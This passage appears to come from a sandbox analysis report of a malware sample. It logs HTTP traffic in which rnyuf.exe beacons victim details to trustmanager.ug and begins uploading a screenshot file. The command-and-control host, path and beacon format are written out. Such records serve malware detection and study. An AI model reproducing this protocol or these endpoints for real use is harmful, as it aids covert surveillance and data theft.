Aug 23, 2021 02:08:59.690947056 CEST	15526	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:08:59.691324949 CEST	15529	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:08:59.691498995 CEST	15531	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:08:59.691891909 CEST	15534	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:08:59.692147970 CEST	15537	OUT	Data Raw: 03 03 f4 a9 6d 2e a6 b2 ba 8e e6 06 db 24 67 20 f6 f7 07 d4 11 c1 15 ed cb 2e a4 e9 72 75 bd ef fd 74 3c 28 e6 35 55 5e 7e 96 b5 bf ae a7 b6 5a 6b 76 fa fc 3e 1f be 83 00 b5 e3 2c 91 e7 25 1c 5b cd 91 fe 7b 57 8b 7c 67 ff 00 92 87 37 fd 7b 45 fc Data Ascii: m.$g .rut<(5U^~Zkv>,%[{W\|g7{EdI$@? fPxPT1k~Wuo{QA )hBIESs@rl<RE.iZZniAisLh/zu\@4)V$PwsN8vUSd&
Aug 23, 2021 02:08:59.692682981 CEST	15541	OUT	Data Raw: d8 aa b9 a3 34 bd 9c 46 58 37 72 f7 6c fd 4d 1f 6b 97 1f 7b 1f 41 55 b3 4b 4f 92 3d 83 62 c1 b9 95 87 32 31 fc 69 a6 46 6e ac 4f d6 a3 a2 8e 48 f6 0b b2 55 72 0e 6b a5 bd bc 78 be 1a b7 cd cb cf b7 f0 ae 5f a0 ad 5d 62 5c 7c 3e 86 3f 5b 93 5c 38 Data Ascii: 4FX7rlMk{AUKO=b21iFnOHUrkx_]b\\|>?[\8'w`%iK)bCM:zj<vS@P7,IV~\2y>oH4k+}Xo`9*>i":L\W:DC IF#NmmdLgl[Z=)C
Aug 23, 2021 02:08:59.906142950 CEST	15602	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:08:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.3	49768	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:59.664453030 CEST	15516	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:08:59.690342903 CEST	15517	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:08:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:08:59.690371990 CEST	15518	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.3	49769	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:59.841677904 CEST	15600	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:08:59.868702888 CEST	15601	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:08:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:08:59.868736982 CEST	15601	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.3	49770	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:00.011514902 CEST	15602	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:00.037549019 CEST	15604	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:00.037579060 CEST	15604	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.3	49772	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:00.215430021 CEST	15605	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----40b0eb3d52330030f6bb67b3bee306cb Host: trustmanager.ug Content-Length: 93529 Cache-Control: no-cache
Aug 23, 2021 02:09:00.215673923 CEST	15605	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 30 62 30 65 62 33 64 35 32 33 33 30 30 33 30 66 36 62 62 36 37 62 33 62 65 65 33 30 36 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------40b0eb3d52330030f6bb67b3bee306cbContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
